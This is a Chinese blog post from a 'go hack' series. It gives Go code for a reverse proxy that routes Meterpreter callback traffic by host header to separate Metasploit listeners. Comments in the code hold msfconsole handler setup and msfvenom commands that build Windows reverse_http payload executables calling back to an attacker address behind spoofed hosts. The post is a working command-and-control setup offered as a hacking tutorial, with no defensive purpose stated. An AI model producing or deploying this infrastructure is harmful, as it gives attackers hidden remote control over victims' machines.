go hack(五)go反向代理与matasploit

go hack(五)go反向代理与matasploit

45度技术宅 45度技术宅 2023-10-31 08:54 发表于山东

 

package main
import ( "fmt" "log" "net/http" "net/http/httputil" "net/url"
"github.com/gorilla/mux")
//使用httputil实现饭代// 首先使用msfconsule生成两个监听器// use exploit/multi/handler// set payload windows/meterpreter_reverse_http// set LHOST 192.168.1.128 代理地址// set LPORT 8080// set ReverseListenerBindAddress 192.168.1.128 实际地址// set ReverseListenerBindPort 10080// exploit -j -z
// 启动两个 一个10080 一个20080
// 生成两个马 在windows上执行,会自动回链LHOST LPORT, 头信息分别为attack1.com /attack2.com// msfvenom -p windows/meterpreter_reverse_http LHOST=xx.xx.xx.xx LPORT=8080 HttpHostHeader=attack1.com -f exe -o payload.exe// msfvenom -p windows/meterpreter_reverse_http LHOST=xx.xx.xx.xx LPORT=8080 HttpHostHeader=attack2.com -f exe -o payload2.exe
var ( hostProxy = make(map[string]string) proxies = make(map[string]*httputil.ReverseProxy) // 路由到代理)
// 变量初始化func init() { hostProxy["attack1.com"] = "http://192.168.1.128:10080" hostProxy["attack2.com"] = "http://192.168.1.128:20080"
for k, v := range hostProxy { // 验证url合法性,并返回net.URL实例 remote, err := url.Parse(v) fmt.Println(remote) if err != nil { panic(err) } // 创建反代实例 proxies[k] = httputil.NewSingleHostReverseProxy(remote) }}
func main() { r := mux.NewRouter() for host, proxy := range proxies { r.Host(host).Handler(proxy) }
log.Fatalln(http.ListenAndServe(":8080", r))}

 

 

 

收录于合集 #go hack
 8
上一篇go hack(二)使用go实现一个简单后门下一篇go hack(六)dns子域探测
阅读 141
文章已于2023-11-06修改
45度技术宅
 
 
关注公众号后可以给作者发消息
 
 
 
 
 
posted @ 2023-12-02 08:24  技术颜良  阅读(42)  评论(0)    收藏  举报